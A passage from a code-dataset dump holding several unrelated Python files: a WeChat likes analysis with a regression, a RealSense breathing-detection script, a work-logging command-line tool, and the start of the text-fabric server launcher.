range(len(itemList)):\n if user_item[i,j] != 0:\n SUMM = SUMM + 1\n\nprint(SUMM)\n\nsingle_max = []\nall_max = []\ntemp = {}\n\ndef takeSecond(elem):\n return elem[1]\n\nfor item in itemList:\n Likes_max = (item['likesSum']) # likes received by a single post\n Author_max = (item['authorId'])\n if Author_max in temp:\n temp[Author_max] += Likes_max\n else:\n temp[Author_max] = Likes_max\n if Author_max != ('wxid_vyebwqsb5wo21'):\n single_max.append((Author_max,Likes_max)) # most-liked single posts\n\nsingle_max.sort(key=takeSecond, reverse=True)\nprint ('Top 5 single posts by likes (excluding the user itself):')\nprint (single_max[0:5])\n\nf = zip(temp.values(),temp.keys())\nall_max = sorted(f,reverse = True)\nprint ('Top 20 by total likes received:')\nprint (all_max[0:21])\n\n# Build the interaction matrix: total likes each user gave to every other user's posts\nuser_interaction = np.zeros((len(userNameList), len(userNameList)))\nuser_index = 0\nusers_index = 0\nfor item in origin_data:\n for user in userNameList:\n if user == item['authorId']:\n for users in userNameList:\n for item_like in item['likes']:\n if users == item_like['userId']:\n user_interaction[user_index, users_index] += 1\n users_index +=1\n user_index +=1\n users_index =0\n user_index =0\n\nmy_num = userNameList.index('wxid_vyebwqsb5wo21') # my index in the user list\nmy_interaction = user_interaction[my_num] # total likes I gave to each other user\nnum = range(0,(len(userNameList))-1) # attach a position index\nf1 = zip(my_interaction,userNameList,num)\nmy_top = sorted(f1,reverse = True)\nmy_top20 = my_top[0:20] # top 20 users I liked the most\nprint ('Highest interaction (most likes given):')\nprint (my_top20)\n\n# Build the top20-indexed top20-item matrix\ntop20_item = np.zeros((len(my_top20)+1, len(itemList)))\nnum_index = 0\nfor top_tuple in my_top20:\n top_index = top_tuple[2]\n top20_item[num_index]=user_item[top_index]\n num_index +=1\ntop20_item[num_index]=user_item[my_num] # append my own like record at the end of the matrix\nprint ('top(20+1)*item matrix')\nprint (top20_item)\n\n# Build the co-occurrence matrix\nco_occurrence = np.zeros((len(userNameList),len(userNameList)))\nfor item in origin_data:\n for likes_user in item['likes']:\n user_index = userNameList.index(likes_user['userId'])\n for likes_user_others in item['likes']:\n if likes_user_others != likes_user:\n user_others_index = userNameList.index(likes_user_others['userId'])\n co_occurrence[user_index,user_others_index] +=1\n\nprint (co_occurrence)\n\n# Find the users whose liking behavior is most similar to mine\nmy_co_occurrence = co_occurrence[my_num]\nf2 = zip(my_co_occurrence,userNameList,num)\nmy_co_top = sorted(f2,reverse = True)\nmy_co_top20 = my_co_top[0:20] # top 20 users who co-liked with me the most\nprint ('Most co-likes:')\nprint (my_co_top20)\n\n# Drop items with no likes, or liked only by me; build the user_item_arranged matrix\nitem_user = np.transpose(user_item)\nitem_arranged = []\nfor i in range(0,len(item_user)):\n if sum(item_user[i]) !=0 : # items with at least one like\n if sum(item_user[i]) ==1:\n if item_user[i,my_num] != 1 : # drop items liked only by me\n item_arranged.append(item_user[i])\n else:\n item_arranged.append(item_user[i])\nuser_item_arranged = np.transpose(item_arranged)\n\n# Build the co_top20-indexed co_top20_item matrix\nco_top20_item = np.zeros((len(my_co_top20)+1, len(item_arranged)))\nnum_index = 0\nfor top_tuple in my_co_top20:\n top_index = top_tuple[2]\n co_top20_item[num_index]=user_item_arranged[top_index]\n num_index +=1\nco_top20_item[num_index]=user_item_arranged[my_num] # append my own like record at the end of the matrix\nprint ('co_top(20+1)*item matrix')\nprint (co_top20_item)\n\nd = np.transpose(co_top20_item)\n#np.random.shuffle(d) # random shuffle\nn, m = d.shape\ntest_num = round(1 * n / 3) # first 1/3 of the dataset as the test set\ntrain_num = n - test_num # remaining 2/3 as the training set\ntrain_data = d[0:train_num,0: (m-1)]\ntrain_data = np.c_[train_data, np.ones((train_num,1))] # the regression has a constant term, so append a column of ones\ntrain_label = d[0:train_num,m-1].reshape(train_num,1) # 1-D arrays default to row vectors in Python; reshape is needed\ntest_data = d[train_num:n,0: (m-1)]\ntest_data = np.c_[test_data, np.ones((test_num, 1))]\ntest_label = d[train_num:n,m-1].reshape(test_num,1)\n\nprint (\"\\n linear regression\")\nprint (\"\\t training start ...\")\nthreshold = (max(train_label) + min(train_label)) / 2\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = linear_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\nprint (\"\\t training done !\")\ntrain_y_predict = train_data.dot(w)\ntest_y_predict = test_data.dot(w)\n\nprint (\"\\t train predict error\\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0)))\nprediction_arranged = np.zeros((len(test_y_predict), 1))\nlength = len(test_y_predict)\nj = range(0,length) # iterate over every prediction (range end is exclusive)\nfor i in j:\n if test_y_predict[i] > 0.2:\n prediction_arranged[i] = 1\n\naccuracy = accuracy_score(test_label,prediction_arranged)\nprecision = precision_score(test_label,prediction_arranged)\nrecall = recall_score(test_label,prediction_arranged)\nfpr,tpr,thresholds = roc_curve(test_label,prediction_arranged)\nroc_auc = roc_auc_score(test_label,prediction_arranged)\n\nplt.plot(fpr,tpr,linewidth=2,label=\"ROC\")\nplt.xlabel(\"false positive rate\")\nplt.ylabel(\"true positive rate\")\nplt.ylim(0,1.05)\nplt.xlim(0,1.05)\nplt.legend(loc=4)# legend position\nplt.show() # ROC curve\n\nprint('Accuracy: {}'.format(accuracy))\nprint('Precision: {}'.format(precision))\nprint('Recall: {}'.format(recall))\n\n'''\nprint (\"\\nlog regression\")\nprint (\"\\t training start ...\")\nmin_label, max_label = min(train_label), max(train_label)\ntrain_label = train_label - min_label + 1 # ensure label > 0 so the log can be taken\ntest_label = test_label - min_label + 1 # ensure label > 0 so the log can be taken\nthreshold = (np.log(max(train_label)) + np.log(min(train_label))) / 2\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = log_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\ntrain_y_predict = train_data.dot(w)\ntest_y_predict = test_data.dot(w)\nprint (\"\\t training done\")\nprint (\"\\t train predict error\\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0.0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0.0)))\n\nprint (\"\\nlogistic regression\")\nprint (\"\\t training start ...\")\nmin_label, max_label = min(train_label), max(train_label)\ntrain_label = (train_label - min_label) / (max_label - min_label) # map labels to 0/1\ntest_label = (test_label - min_label) / (max_label - min_label) # map labels to 0/1\nthreshold = 0.5\ngamma, eps, max_iter = 0.001, 0.00001, 10000\nw = logistic_regression(train_data, train_label, 'gd', gamma, eps, max_iter)\nprint (\"\\t training done\")\ntrain_y_predict = sigmoid(train_data.dot(w))\ntest_y_predict = sigmoid(test_data.dot(w))\nprint (\"\\t train predict error \\t: %f\"%(sum( abs( ((train_y_predict > threshold) + 0) - ((train_label > threshold) + 0) ))[0] / (train_num + 0.0)))\nprint (\"\\t test predict error \\t: %f\"%(sum( abs( ((test_y_predict > threshold) + 0) - ((test_label > threshold) + 0) ))[0] / (test_num + 0.0)))\n\n'''","sub_path":"JSONTest(1).py","file_name":"JSONTest(1).py","file_ext":"py","file_size_in_byte":10736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"248989058","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 22 10:04:48 2020\r\n\r\n@author: Allan\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pyrealsense2 as rs\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.signal as signal\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\r\nmean_all=[]\r\n#mean_all=np.zeros([1500,1])\r\nframe_all=[]\r\nconfig = rs.config()\r\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\r\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\r\n#rs.config.enable_device_from_file(config, \"C:/Users/Allan/Desktop/JRF/Realsense/Python/test3.bag\", repeat_playback=False)\r\npipeline = rs.pipeline()\r\nprofile=pipeline.start(config)\r\ndevice = profile.get_device()\r\ndepth_sensor = device.query_sensors()[0]\r\nset_laser = 20\r\ndepth_sensor.set_option(rs.option.laser_power, set_laser)\r\ntemp=np.zeros([2,1])\r\npeaks=[]\r\nvalley=[]\r\ncon=[]\r\ni=0\r\nj=0\r\nk=0\r\n\r\na1=scipy.io.loadmat('filter_coef_2.mat')\r\na=a1['h']\r\na=np.transpose(a)\r\na=a[:,0]\r\n\r\n#playback = profile.get_device().as_playback()\r\n#playback.set_real_time(False)\r\n\r\n#a=np.load('filt_coeff_1.npy')\r\nx_n=np.zeros([17,])\r\ntry:\r\n while True:\r\n # Wait for a coherent pair of frames: depth and color\r\n frames = pipeline.wait_for_frames()\r\n frame_no=frames.get_frame_number() #Get frame number\r\n frame_time=frames.get_timestamp() #Get timestamp\r\n frame_all.append(frame_no)\r\n i=i+1\r\n if frame_no<20:\r\n continue\r\n if frame_no>1500:\r\n break\r\n depth_frame = frames.get_depth_frame()\r\n color_frame = frames.get_color_frame()\r\n if not depth_frame or not color_frame:\r\n continue\r\n\r\n # Convert images to numpy arrays\r\n depth_image = np.asanyarray(depth_frame.get_data())\r\n color_image = 
np.asanyarray(color_frame.get_data())\r\n #Convert color to gray for classifier\r\n gray_bg=cv2.cvtColor(color_image,cv2.COLOR_BGR2GRAY)\r\n depth_color = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\r\n #Detect faces in grayed RGB frame\r\n faces=face_cascade.detectMultiScale(gray_bg,1.1,5)\r\n #Use coordinates to define ROI\r\n # for (x,y,w,h) in faces:\r\n # img=cv2.rectangle(color_image,(x-50,y+250),(x+w,y+h+220),(255,0,0),2)\r\n # img1=cv2.rectangle(depth_color,(x-50,y+250),(x+w,y+h+220),(0,255,0),2)\r\n # roi_bg=color_image[y:y+h,x:x+w]\r\n #images.append(color_image)\r\n #Use ROI to find chest in depth frame\r\n (x,y,w,h) =faces[0]\r\n roi_depth=depth_image[y+250:y+h+220,x-50:x+w]\r\n #roi_all.append(roi_depth)\r\n #Replace zeros in depth with median value \r\n roi_meter=roi_depth*0.001\r\n m=np.median(roi_meter[roi_meter>0])\r\n roi_meter[roi_meter==0]=m\r\n \r\n mean_depth=np.mean(roi_meter)\r\n mean_all.append(mean_depth)\r\n# mean_all[i]=mean_depth\r\n \r\n try:\r\n# x_n=np.delete(x_n,-1)\r\n x_n=np.roll(x_n,1)\r\n x_n[0]=mean_depth\r\n k=k+1\r\n y=a*x_n\r\n y=sum(y)\r\n# y=np.convolve(a,x_n)\r\n #y=signal.lfilter(a,1,x_n)\r\n# y=sum(y)\r\n con.append(y)\r\n except:\r\n continue\r\n# con=con[::-1]\r\n if i>=1:\r\n diff_mean=np.sign(con[j]-con[j-1])\r\n j+=1\r\n temp[1]=diff_mean\r\n if temp[0]!=temp[1]:\r\n if temp[1]==-1:\r\n peaks.append(j-1)\r\n \r\n elif temp[1]==1:\r\n valley.append(j-1)\r\n \r\n temp[0]=temp[1]\r\n print(\"frame number\",frame_no)\r\n \r\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\r\n \r\n# color_all.append(color_frame)\r\n# Stack both images horizontally\r\n # images = np.hstack((color_image, depth_color))\r\n #print(\"frame no\",frame_no)\r\n# mean_all=np.array(mean_all)\r\n# plt.figure(2)\r\n# plt.plot(mean_all)\r\n# plt.plot(mean_all[peaks],'x')\r\n# plt.plot(mean_all[valley],'o')\r\n# plt.pause(0.0001)\r\n\r\n # Show images\r\n # cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\r\n # cv2.imshow('RealSense', depth_color)\r\n # key=cv2.waitKey(1)\r\n # if key & 0xFF == ord('q') or key == 27:\r\n\r\n # cv2.destroyAllWindows()\r\n # break\r\nexcept RuntimeError:\r\n print(\"There are no more frames left in the .bag file!\")\r\n\r\nfinally:\r\n pipeline.stop()\r\n\r\n# ts=frame_all[len(frame_all)-1]-frame_all[0]\r\n# ts=ts*0.001\r\ntot_time=frame_no/30\r\n# print(\"Total time(in sec) is \",ts)\r\n# time=np.linspace(0,tot_time,num=len(mean_all))\r\n# mean_out=[sum(mean_all[i:i+3])/3 for i in range(len(mean_all)-3+1)]\r\n# mean_out=np.array(mean_out)\r\n# mean_out=mean_out[np.logical_not(np.isnan(mean_out))]\r\n# mean_decimate=signal.decimate(mean_all,3)\r\n\r\n# for i in np.arange(0,len(mean_all)):\r\n# if i>=1:\r\n# diff_mean=np.sign(mean_all[i]-mean_all[i-1])\r\n# temp[1]=diff_mean\r\n# if temp[0]!=temp[1]:\r\n# if temp[1]==-1:\r\n# peaks.append(i-1)\r\n# elif temp[1]==1:\r\n# valley.append(i-1)\r\n# temp[0]=temp[1]\r\n#con=con[13:len(con)]\r\ncon=np.array(con)\r\npeaks=np.array(peaks)\r\nvalley=np.array(valley)\r\ntime1=np.linspace(0,tot_time,num=len(mean_all))\r\ntime2=np.linspace(0,tot_time,num=len(con))\r\nplt.figure(3)\r\nplt.plot(time1,mean_all)\r\n#mean_all=np.array(mean_all)\r\n#plt.plot(time1[peaks],mean_all[peaks],'x')\r\n#plt.plot(time1[valley],mean_all[valley],'o')\r\nplt.figure(4)\r\nplt.plot(time2,con)\r\nplt.plot(time2[peaks],con[peaks],'x')\r\nplt.plot(time2[valley],con[valley],'o')\r\n# plt.ylim([mean_tot+0.05,mean_tot-0.05])\r\n# plt.figure(4)\r\n# 
plt.plot(time1,mean_decimate)\r\n# plt.show()\r\n\r\n# ##Plot belt respiration\r\n# #ref=pd.read_csv('C:/Users/Allan/Desktop/JRF/Realsense/Python/Reference/test1.csv')\r\n# #time2=ref['Time(s)']\r\n# #resp=ref['Force(N)']\r\n# #resp_norm=(resp-resp.min())/(resp.max()-resp.min())\r\n# #plt.plot(time2,resp_norm)","sub_path":"Live_Run/playback_Viola_chest.py","file_name":"playback_Viola_chest.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"516566898","text":"import config\nimport os\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nfrom clint.textui import colored, indent, puts\n\nfrom libs import app\n\n\nclass WWorkApp(app.Application):\n STORAGE_RELATIVE_PATH = '/storage/'\n COLORS = {\n 'blu': ('\\x1b[34m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'gre': ('\\x1b[32m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'red': ('\\x1b[31m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n 'yel': ('\\x1b[33m\\x1b[22m', '\\x1b[39m\\x1b[22m'),\n }\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialization method.\"\"\"\n super().__init__(*args, **kwargs)\n self._file = None\n self.previous = None\n\n for flag in self.flags.all:\n if flag and flag.startswith('-y'):\n self.previous = -flag.count('y')\n\n @app.register('start')\n def start(self):\n \"\"\"Command to start a new perfect work day!\n\n Example:\n ww start # creates file for current day\n ww start prev # creates file for previous day\n\n \"\"\"\n if self.file_exists():\n return self.print(\n 'Day already started! Go to work now ;)'\n )\n\n result = self.write('s', 'Start a new work day!', new_file=True)\n\n self.print(result)\n self.print(f'File \"{self.file_path}\" has been created!')\n\n @app.register('end')\n def end(self):\n \"\"\"Command to end this hard work day!\n\n Example:\n ww end\n\n \"\"\"\n assert self.file\n assert self.not_on_pause\n\n result = self.write('e', 'End of the day!', new_file=False)\n\n # Show result\n self.print(result)\n self.print('Day finally ended!')\n\n @app.register('delete', 'del')\n def delete_file(self):\n \"\"\"Command to delete file.\n\n Example:\n ww del 2018-12-31\n ww delete 2018-12-31\n ww delete 2018-12-31.txt\n\n \"\"\"\n if not self.extra:\n self.exit('Specify date in format like 2018-12-31')\n\n file_date = self.extra[0].rstrip('.txt')\n file_path = self.storage_dir + file_date + '.txt'\n\n if not self.file_exists(path=file_path):\n self.exit(f'Error! File \"{file_path}\" does not exist!')\n\n try:\n os.remove(file_path)\n except Exception:\n self.exit(f'Error on removing file {file_path}')\n\n self.print(f'File \"{file_path}\" was successfully deleted!')\n\n @app.register('pause', 'p')\n def pause(self):\n \"\"\"Command to pause or resume the work day.\n\n Example:\n ww pause\n\n \"\"\"\n # Enable pause\n if self.last_command != 'p':\n self.write('p', 'Pause init ╮')\n self.print('Pause is enabled. Go REST. Or EAT.')\n\n # Disable pause\n else:\n self.write('u', 'Pause stop ╯')\n self.print('Pause is disabled. 
Go WORK.')\n\n duration = self.get_duration(start=-2, end=-1)\n self.print(f'Pause duration is {duration}')\n\n @app.register('time')\n def count_time(self):\n if len(self.extra) != 1:\n self.exit('Incorrect command format')\n\n value = float(self.extra[0])\n remaining = 8.0 - value\n self.print(\n f'{value} is {int(value // 1)} hours and '\n f'{int(value % 1 * 60)} minutes'\n )\n self.print(\n f'Remaining time is {int(remaining // 1)} hours and '\n f'{int(remaining % 1 * 60)} minutes'\n )\n\n @app.register(default=True)\n def log_task(self, task=None, msg=None):\n \"\"\"Command to log your work (default command).\n\n Example:\n ww JIRA-1012 I did something interesting\n ww 1024 Jira code can be skipped\n ww Standup\n\n \"\"\"\n if len(set(self.command)) == 1:\n self.exit('Probably, you won\\'t log task with one symbol...')\n\n assert self.file\n assert self.not_on_pause\n\n change_time = 0\n\n for word in tuple(self.extra):\n if word.startswith('+'):\n change_time = int(word[1:])\n self.extra.remove(word)\n\n if task:\n string = f'{task}: '\n elif self.command.split('-')[-1].isdigit():\n string = f'{config.DEFAULT_JIRA_CODE}-{self.command}: '\n elif self.command.split('.')[-1].isdigit():\n a, b = self.command.split('.')\n string = f'{a}-{b}: '\n else:\n string = f'{config.MAIN_TASK_CODE}: {self.command} '\n\n msg = msg or ' '.join(self.extra)\n\n string += msg\n\n if not string.endswith(('.', '!', '?', ')', '(')):\n string = string.strip() + '.'\n\n result = self.write('w', string, change_time=change_time)\n\n self.print(result)\n self.print('Task is logged ✓', pre='')\n\n @app.register(empty_args=True)\n def main_screen(self):\n \"\"\"Command to show main app screen.\n\n Example:\n ww # main screen for current day\n\n \"\"\"\n assert self.file\n\n os.system('clear')\n\n colors_map = {\n 's': colored.green,\n 'u': colored.yellow,\n 'p': colored.yellow,\n 'e': colored.red,\n }\n\n with indent(2):\n if self.previous is not None:\n formatted = self.date.strftime('%B %d, %A')\n self.print(f'DATE: {formatted}')\n self.print(f'FILE: {self.file_path}')\n\n # Show main table\n self.print('TIME TASK NAME', post='\\n')\n\n for line in self.file:\n color = colors_map.get(line[0])\n msg = (color(line[2:7]) if color else line[2:7]) + line[7:]\n self.print(msg, pre='', newline=False)\n\n @app.register('fc', 'from')\n def from_commit(self):\n commit_msg = os.popen('git log -1').read()\n\n if not commit_msg:\n self.exit('This is not a git repository')\n\n messages = commit_msg.split('\\n')[4:]\n message = messages[0].lstrip() + '.' 
# one liner usually has no dot\n self.print(message)\n\n self.write('w', message)\n\n @app.register('e', 'edit')\n def edit(self):\n editor = 'vim'\n os.system(' '.join([editor, self.file_path]))\n\n @app.register('st', 'stand', 'standup')\n def standup(self):\n self.log_task(task='RND-4', msg='[STANDUP]')\n\n # Helper methods\n # ========================================================================\n\n def print(self, msg, color=None, pre='\\n', post='', newline=True):\n \"\"\"Print message in console.\"\"\"\n msg = pre + msg + post\n\n if color:\n msg = color(msg)\n else:\n for name, data in self.COLORS.items():\n msg = msg.replace(f'<{name}>', data[0])\n msg = msg.replace(f'', data[1])\n\n puts(msg, newline)\n\n def exit(self, msg):\n self.print(msg, color=colored.red, pre='\\n', post='\\n')\n exit()\n\n def file_exists(self, path=None):\n return Path(path or self.file_path).is_file()\n\n @property\n def storage_dir(self):\n return os.path.dirname(__file__) + self.STORAGE_RELATIVE_PATH\n\n @property\n def file_path(self):\n return self.storage_dir + self.get_date(delta=self.previous) + '.txt'\n\n @property\n def date(self):\n return self.get_date(delta=self.previous, as_string=False)\n\n @property\n def file(self):\n if not self._file:\n self._file = self.read_file()\n\n return self._file\n\n @property\n def last_command(self):\n return self.file[-1][0]\n\n @property\n def not_on_pause(self):\n if self.last_command == 'p':\n self.exit('Looks like you forgot to unpause?')\n\n return True\n\n def get_date(self, delta=None, as_string=True):\n date = datetime.now()\n\n if delta is not None:\n date += timedelta(days=delta)\n\n return date.strftime(config.DATE_FORMAT) if as_string else date\n\n def get_current_time(self):\n \"\"\"Get current time in HH:MM format.\"\"\"\n return datetime.now().strftime(config.TIME_FORMAT)\n\n def get_duration(self, start, end, as_string=True):\n start_str = self.file[start][2:7]\n stop_str = self.file[end][2:7]\n\n start_time = datetime.strptime(start_str, config.TIME_FORMAT)\n stop_time = datetime.strptime(stop_str, config.TIME_FORMAT)\n\n duration = (stop_time - start_time).seconds\n duration_str = str(timedelta(seconds=duration))[:-3]\n\n return f'{duration_str} ({start_str} - {stop_str})' \\\n if as_string else duration\n\n def write(self, code, msg, new_file=False, change_time=False):\n \"\"\"Write line with time and message to file.\"\"\"\n if change_time:\n last_time_str = self.file[-1][2:7]\n last_time = datetime.strptime(last_time_str, config.TIME_FORMAT)\n last_time += timedelta(minutes=change_time)\n task_time = last_time.strftime(config.TIME_FORMAT)\n self.print(\n f'Modified time +{change_time} minutes: {task_time}',\n color=colored.yellow, pre='\\n'\n )\n else:\n task_time = self.get_current_time()\n line = '{} {} {}\\n'.format(code, task_time, msg)\n write_mode = 'w' if new_file else 'a'\n try:\n with open(self.file_path, write_mode) as f:\n f.writelines(line)\n except IOError:\n self.exit('Can not write the file: ' + self.file_path)\n\n return line[2:]\n\n def read_file(self):\n res = None\n try:\n with open(self.file_path, 'r') as f:\n res = f.readlines()\n except IOError:\n self.exit('Can not read file: ' + self.file_path)\n\n return res\n\n\nif __name__ == '__main__':\n WWorkApp().run()\n","sub_path":"wwork.py","file_name":"wwork.py","file_ext":"py","file_size_in_byte":10011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"72364344","text":"\"\"\"\n.. 
include:: ../../docs/server/start.md\n\"\"\"\n\nimport sys\nimport os\nfrom platform import system\n\nimport psutil\nimport webbrowser\nfrom time import sleep\nfrom subprocess import PIPE, Popen\n\nfrom ..core.helpers import console\nfrom ..parameters import NAME, VERSION, PROTOCOL, HOST\n\nfrom .command import (\n argKill,\n argShow,\n argNoweb,\n argApp,\n getPort,\n repSlug,\n)\nfrom .kernel import TF_DONE, TF_ERROR\n\nHELP = \"\"\"\nUSAGE\n\ntext-fabric --help\ntext-fabric --version\ntext-fabric -k [app]\ntext-fabric -p [app]\n\ntext-fabric ./path/to/app --locations=locations-string [--modules=modules-string] args\ntext-fabric app[:specifier] args\n\nwhere all args are optional and args have one of these forms:\n\n -noweb\n --checkout=specifier\n --mod=modules\n --set=file\n --modules=modules-string\n --locations=locations-string\n\nEFFECT\n\nIf an app is given and the -k and -p flags are not passed,\na TF kernel for that app is started.\nWhen the TF kernel is ready, a web server is started\nserving a website that exposes the data through\na query interface.\n\nThe default browser will be opened, except when -noweb is passed.\n\nInstead of a standard app that is available on https://github.com/annotation\nyou can also specify an app you have locally, or no app at all.\n\n\n\"\" (empty string): no app\npath-to-directory: the directory in which your app resides. This argument\nmust have a / inside (e.g. ./myapp).\nThe directory may contain zero or more of these app.py, config.yaml, static/display.css\nIf they are found, they will be used.\n\nIf no app is specified, TF features will be loaded according to the\n--locations and --modules args.\n\nFor standard apps, the following holds:\n\n:specifier (after the app)\n--checkout=specifier\n\nThe TF app itself can be downloaded on the fly from GitHub.\nThe main data can be downloaded on the fly from GitHub.\nThe specifier indicates a point in the history from where the app should be retrieved.\n :specifier is used for the TF app code.\n --checkout=specifier is used for the main data.\n\nSpecifiers may be:\n local - get the data from your local text-fabric-data directory\n clone - get the data from your local github clone\n latest - get the latest release\n hot - get the latest commit\n tag (e.g. v1.3) - get specific release\n hash (e.g. 78a03b...) 
- get specific commit\n\nNo specifier or the empty string means: latest release if there is one, else latest commit.\n\n--mod=modules\n\nOptionally, you can pass a comma-separated list of modules.\nModules are extra sets of features on top of the chosen data source.\nYou specify a module by giving the github repository where it is created,\nin the form\n\n    {org}/{repo}/{path}\n    {org}/{repo}/{path}:specifier\n\nwhere\n    {org} is the github organization,\n    {repo} the name of the repository in that organization\n    {path} the path to the data within that repo.\n    {specifier} points to a release or commit in the history\n\nIt is assumed that the data is stored in directories under {path},\nwhere the directories are named as the versions that exist in the main data source.\n\n--set=file\n\nOptionally, you can pass a file name with the definition of custom sets in it.\nThis must be a dictionary where the keys are names of sets, and the values\nare node sets.\nThis dictionary will be passed to the TF kernel, which will use it when it runs\nqueries.\n\nDATA LOADING\n\nText-Fabric looks for data in ~/text-fabric-data.\nIf data is not found there, it first downloads the relevant data from\ngithub.\n\nMISCELLANEOUS\n\n-noweb Do not start the default browser\n\n\nCLEAN UP\n\nIf you press Ctrl-C the web server is stopped, and after that the TF kernel\nas well.\nNormally, you do not have to do any clean up.\nBut if the termination is done in an irregular way, you may end up with\nstray processes.\n\n-p Show mode. If a data source is given, the TF kernel and web server for that\n   data source are shown.\n   Without a data source, all local webinterface related processes are shown.\n-k Kill mode. If a data source is given, the TF kernel and web server for that\n   data source are killed.\n   Without a data source, all local webinterface related processes are killed.\n\"\"\"\n\nFLAGS = set(\n    \"\"\"\n    -noweb\n\"\"\".strip().split()\n)\n\nBANNER = f\"This is {NAME} {VERSION}\"\n\n\ndef filterProcess(proc):\n    procName = proc.info[\"name\"]\n    commandName = \"\" if procName is None else procName.lower()\n\n    kind = None\n    slug = None\n\n    trigger = \"python\"\n    if commandName.endswith(trigger) or commandName.endswith(f\"{trigger}.exe\"):\n        parts = [p for p in proc.cmdline() if p not in FLAGS]\n        if parts:\n            parts = parts[1:]\n        if parts and parts[0] == \"-m\":\n            parts = parts[1:]\n        if not parts:\n            return False\n        (call, *args) = parts\n\n        trigger = \"text-fabric\"\n        if call.endswith(trigger) or call.endswith(f\"{trigger}.exe\"):\n            if any(arg in {\"-k\", \"-p\"} for arg in args):\n                return False\n            slug = argApp(parts)[1]\n            ports = ()\n            kind = \"text-fabric\"\n        else:\n            if call == \"tf.server.kernel\":\n                kind = \"kernel\"\n            elif call == \"tf.server.web\":\n                kind = \"web\"\n            elif call.endswith(\"web.py\"):\n                kind = \"web\"\n            else:\n                return False\n            (slug, *ports) = args\n\n        return (kind, slug, *ports)\n    return False\n\n\ndef indexProcesses():\n    tfProcesses = {}\n    for proc in psutil.process_iter(attrs=[\"pid\", \"name\"]):\n        test = filterProcess(proc)\n        if test:\n            (kind, pSlug, *ports) = test\n            tfProcesses.setdefault(pSlug, {}).setdefault(kind, []).append(\n                (proc.info[\"pid\"], *ports)\n            )\n    return tfProcesses\n\n\ndef showProcesses(tfProcesses, slug, term=False, kill=False):\n    item = (\"killed\" if kill else \"terminated\") if term else \"\"\n    if item:\n        item = f\": {item}\"\n    myself = os.getpid()\n    for (pSlug, kinds) in tfProcesses.items():\n        if slug is None or (slug == pSlug):\n            checkKinds = (\"kernel\", \"web\", 
\"text-fabric\")\n rSlug = repSlug(pSlug)\n for kind in checkKinds:\n pidPorts = kinds.get(kind, [])\n for pidPort in pidPorts:\n pid = pidPort[0]\n port = pidPort[-1] if len(pidPort) > 1 else None\n portRep = \"\" if port is None else f\": {port:>5}\"\n if pid == myself:\n continue\n processRep = f\"{kind:<12} % {pid:>5}{portRep:>7}\"\n try:\n proc = psutil.Process(pid=pid)\n if term:\n if kill:\n proc.kill()\n else:\n proc.terminate()\n console(f\"{processRep} {rSlug}{item}\")\n except psutil.NoSuchProcess:\n if term:\n console(\n f\"{processRep} {rSlug}: already {item}\", error=True,\n )\n\n\ndef connectPort(tfProcesses, kind, pos, slug):\n pInfo = tfProcesses.get(slug, {}).get(kind, None)\n return pInfo[0][pos] if pInfo else None\n\n\ndef main(cargs=sys.argv):\n console(BANNER)\n if len(cargs) >= 2 and any(\n arg in {\"--help\", \"-help\", \"-h\", \"?\", \"-?\"} for arg in cargs[1:]\n ):\n console(HELP)\n return\n if len(cargs) >= 2 and any(\n arg in {\"--version\", \"-version\", \"-v\"} for arg in cargs[1:]\n ):\n return\n\n isWin = system().lower().startswith(\"win\")\n pythonExe = \"python\" if isWin else \"python3\"\n\n kill = argKill(cargs)\n show = argShow(cargs)\n\n (appName, slug, newPortKernel, newPortWeb) = argApp(cargs)\n\n if appName is None and not kill and not show:\n return\n\n noweb = argNoweb(cargs)\n\n tfProcesses = indexProcesses()\n\n if kill or show:\n if appName is False:\n return\n showProcesses(tfProcesses, None if appName is None else slug, term=kill)\n return\n\n stopped = False\n portKernel = connectPort(tfProcesses, \"kernel\", 1, slug)\n portWeb = None\n\n processKernel = None\n processWeb = None\n\n if portKernel:\n console(f\"Connecting to running kernel via {portKernel}\")\n else:\n portKernel = getPort(portBase=newPortKernel)\n console(f\"Starting new kernel listening on {portKernel}\")\n if portKernel != newPortKernel:\n console(f\"\\twhich is the first free port after {newPortKernel}\")\n processKernel = Popen(\n [pythonExe, \"-m\", \"tf.server.kernel\", slug, str(portKernel)],\n stdout=PIPE,\n bufsize=1,\n encoding=\"utf-8\",\n )\n console(f\"Loading data for {appName}. 
